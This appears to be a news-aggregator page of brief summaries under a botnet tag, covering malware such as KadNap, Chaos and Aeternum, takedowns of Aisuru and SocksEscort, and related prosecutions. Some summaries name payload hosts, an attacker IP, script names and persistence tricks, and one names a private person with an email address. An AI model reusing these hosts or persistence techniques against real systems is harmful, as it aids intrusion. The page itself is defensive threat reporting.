All news with #botnet tag

🛡️ A concise roundup of the week's notable incidents: a resilient hybrid variant of Phorpiex combines HTTP C2 polling with a P2P protocol to survive takedowns, while a 13‑year‑old chainable flaw in Apache ActiveMQ (CVE-2026-34197) can yield stealthy RCE if left unpatched. Industry data show record cyber‑fraud losses and a spike in AI‑assisted DDoS tactics. Multiple supply‑chain and platform abuses—from trojanized developer tools to malicious PyPI packages and SaaS notification phishing—underscore the need to patch, audit, and harden AI integrations.

🔍 Cybersecurity firm Darktrace has identified a new variant of the Chaos botnet that targets misconfigured cloud deployments, expanding the malware's focus beyond routers and edge devices. The 64-bit ELF binary was delivered to a deliberately misconfigured Hadoop honeypot via an HTTP request that created an application embedding shell commands to fetch and execute the payload from pan.tenire[.]com. The updated sample removes SSH- and router-based spread features and instead implements a SOCKS proxy, enabling compromised hosts to relay attacker traffic and broadening the botnet's monetization and evasion capabilities.

📈 NETSCOUT’s ATLAS platform recorded more than 8 million DDoS attacks across 203 countries during the second half of 2025, revealing a decisive shift toward multiterabit capacity and AI-enabled operations. IoT-based botnets such as Aisuru and TurboMirai variants produced demonstration floods up to 30Tbps and 4Gpps, while dark-web LLMs and conversational interfaces lowered the barrier for complex, multivector campaigns. Persistent pressure on DNS root servers and NTP services highlighted the importance of globally distributed, intelligence-driven defenses.

🛡️Masjesu, also tracked as XorBot, is a stealthy DDoS-for-hire botnet that targets diverse IoT devices including routers, gateways, cameras, DVRs and NVRs. First observed in 2023 and updated through 2024, it uses XOR-based obfuscation, avoids blocklisted ranges (including DoD IPs), and emphasizes persistence and low visibility. After binding a hard-coded TCP port (55988) the malware establishes persistence, disables common tools like wget and curl, and connects to remote controllers to receive flood commands. Its traffic is concentrated in Vietnam, Ukraine, Iran, Brazil, Kenya and India, with Vietnam accounting for nearly half of observed activity.

🛡️ An active campaign is exploiting internet-exposed ComfyUI instances to recruit them into a cryptomining and proxy botnet. Censys researchers found attacker tooling that scans cloud IP ranges, abuses unsafe custom nodes for unauthenticated remote code execution, and installs miners (XMRig, lolMiner) and a Hysteria V2 proxy. The payloads persist via periodic retrieval of a ghost.sh script and use techniques such as LD_PRELOAD and chattr +i to resist removal, while a Flask-based C2 panel provides centralized control. Defenders are advised not to expose ComfyUI publicly, to require authentication, and to remove or audit any nodes that execute raw Python.

⚖️ The U.S. Department of Justice sentenced Russian national Ilya Angelov to two years in prison and fined him $100,000 for operating a botnet that enabled ransomware attacks against American companies. Angelov, 40, of Tolyatti, used aliases "milan" and "okart" and co‑managed the Russia‑based cybercriminal group TA551, which distributed malware-laden spam and sold access to compromised machines. Prosecutors say TA551 sold bot access to groups behind BitPaymer and IcedID, contributing to millions in extortion payments.

🔒 Ilya Angelov, a 40-year-old Russian national who used the handles milan and okart, was sentenced to two years in prison after admitting he managed the Mario Kart phishing botnet that helped deliver ransomware. The botnet distributed malware via massive spam campaigns—up to 700,000 emails per day—and at its peak infected about 3,000 machines daily. Authorities linked the botnet to BitPaymer attacks on 72 U.S. companies, resulting in over $14 million in extortion payments.

🛡️ Law enforcement in Germany, Canada and the United States have jointly disrupted two of the world’s largest DDoS botnets, taking critical infrastructure offline and seizing evidence. The operation targeted Aisuru, which infected poorly secured IoT devices, and the related Kimwolf, which focused on Android and consumer devices. Authorities recovered multiple data carriers and seized five-figure cryptocurrency holdings, though arrests were limited and the criminal network is not yet fully dismantled.

🎵 North Carolina musician Michael Smith pleaded guilty to running a multi-year streaming fraud that generated over $10 million in illicit royalties. Smith purchased hundreds of thousands of AI-generated songs and uploaded them to Spotify, Apple Music, Amazon Music, and YouTube Music, then used automated bots routed through VPNs to create billions of fake streams between 2017 and 2024. Prosecutors say he ran more than 1,000 bot accounts, agreed to $8,091,843.64 in forfeiture, and faces up to five years in prison after pleading to one count of conspiracy to commit wire fraud.

🚨 U.S., German, and Canadian authorities dismantled command-and-control infrastructure used by the Aisuru, KimWolf, JackSkid, and Mossad IoT botnets, seizing virtual servers, domains, and related assets. The Justice Department says the four botnets had ensnared more than three million devices and issued hundreds of thousands of DDoS commands, including record-setting attacks by Aisuru. Private firms such as Akamai assisted, warning the campaigns disrupted ISP services and even targeted government IPs including DoDIN.

🔒 The U.S. Department of Justice announced a court-authorized operation that disrupted command-and-control infrastructure used by multiple IoT Mirai variants, including AISURU, Kimwolf, JackSkid, and Mossad. Authorities from Canada and Germany, assisted by major vendors such as AWS, Cloudflare, and Akamai, helped dismantle networks that collectively enslaved roughly 3 million devices and enabled record-breaking DDoS attacks exceeding 30 Tbps. The action seeks to curb a cybercrime-as-a-service market that sold access to compromised DVRs, webcams, routers, and off-brand Android TVs.

🛡️ The U.S. Justice Department, with Canadian and German partners, dismantled infrastructure for four major IoT botnets — Aisuru, Kimwolf, JackSkid and Mossad — that compromised more than three million devices and launched hundreds of thousands of DDoS attacks. The action targeted U.S.-registered domains and virtual servers and aimed to stop further infections and future attacks. Law enforcement credited nearly two dozen tech firms for assisting in the operation.

🔒 This weekly recap spotlights multiple high‑urgency incidents, including two actively exploited Chrome zero‑days—an out‑of‑bounds write in Skia (CVE‑2026‑3909) and an implementation flaw in V8 (CVE‑2026‑3910)—patched in Chrome 146.0.7680.75/76. It also documents large router botnets such as SocksEscort and KadNap that flash custom firmware to maintain persistence and operate as proxy services. Supply‑chain abuse reappears with UNC6426, which used stolen nx npm keys and abused GitHub→AWS OIDC trust to gain admin access and exfiltrate S3 data within 72 hours. Prioritize patching actively exploited flaws, audit OIDC/S3 trusts and router persistence, and monitor for emerging supply‑chain and AI‑agent risks.

🚨 Authorities dismantled the criminal proxy service SocksEscort, which enslaved thousands of residential routers worldwide to operate a large-scale proxy botnet and sold anonymous access for fraud and other crimes. U.S. and European partners executed a court-authorized disruption, seizing domains and servers and freezing roughly $3.5 million in cryptocurrency. The service relied on AVrecon malware that exploited SOHO router vulnerabilities to persistently infect devices and route traffic for criminal customers.

🛡️ U.S. and European law enforcement, assisted by Lumen’s Black Lotus Labs and private partners, disrupted the SocksEscort proxy network that relied on Linux-targeting AVRecon malware to compromise edge devices. The takedown seized domains and servers, froze about $3.5 million in cryptocurrency, and disconnected listed infected routers from the service. Authorities say SocksEscort sold access to hundreds of thousands of IPs and was tied to multimillion-dollar frauds. Investigations and remediation efforts continue.

🛡️ Cybersecurity researchers at Black Lotus Labs have identified a novel malware family, KadNap, that has infected over 14,000 edge devices — primarily Asus routers — since first observed in August 2025. KadNap uses a custom Kademlia-based DHT to conceal its control infrastructure and build a resilient peer-to-peer botnet. Infected devices are being offered as resident proxies by a service named Doppelgänger, complicating attribution and abuse tracking.

🔒 KadNap is a newly observed botnet that compromises primarily ASUS routers and other edge devices to assemble a distributed proxy network. Since August 2025 it has grown to roughly 14,000 nodes and uses a modified Kademlia Distributed Hash Table (DHT) protocol to conceal command-and-control infrastructure and complicate takedowns. Infections begin when a malicious script (aic.sh) is fetched from 212.104.141.140, which installs an ELF binary named kad and establishes persistence via a cron job that runs every 55 minutes. Researchers at Black Lotus Labs link KadNap to the Doppelganger/Faceless proxy service that sells access to infected devices, and Lumen has blocked related traffic on its network while preparing indicators of compromise.

🔎 This article analyzes public evidence tying the alleged Kimwolf botmaster—known online as Dort and by earlier handles like CPacket and M1ce—to accounts, emails and domain registrations linked to an Ottawa-based Jacob Butler. It reviews GitHub and forum footprints (jay.miner232@gmail.com / MemeClient), ties to SIM Land and LAPSUS$ activity, and allegations that Dort sold disposable-email and CAPTCHA-bypass tools. After KrebsOnSecurity published research in January 2026 that disrupted Kimwolf’s spread, Dort allegedly mounted doxing, DDoS, email-flooding and swatting campaigns against researchers and the author.

🧭 Researchers disclosed a new botnet loader named Aeternum C2 that stores encrypted commands on the public Polygon blockchain, making its C2 infrastructure resistant to conventional takedowns. The native C++ loader (x86/x64) polls Polygon RPC endpoints to retrieve transactions written by a web panel implemented in Next.js. Operators can deploy multiple smart contracts, write immutable encrypted commands, and manage payloads with minimal operational cost while leveraging anti-analysis checks and AV-evasion scanning.

⛓️ A newly discovered loader named Aeternum relocates botnet command-and-control onto the Polygon blockchain, researchers at Qrator Research Lab report. Infected machines retrieve instructions written as on-chain transactions and poll more than 50 RPC endpoints instead of contacting centralized servers or domains. The seller offers native C++ builds and a web dashboard that writes commands to smart contracts, creating a low-cost, resilient C2 channel that complicates traditional takedowns and shifts defensive emphasis to edge filtering and proactive DDoS mitigation.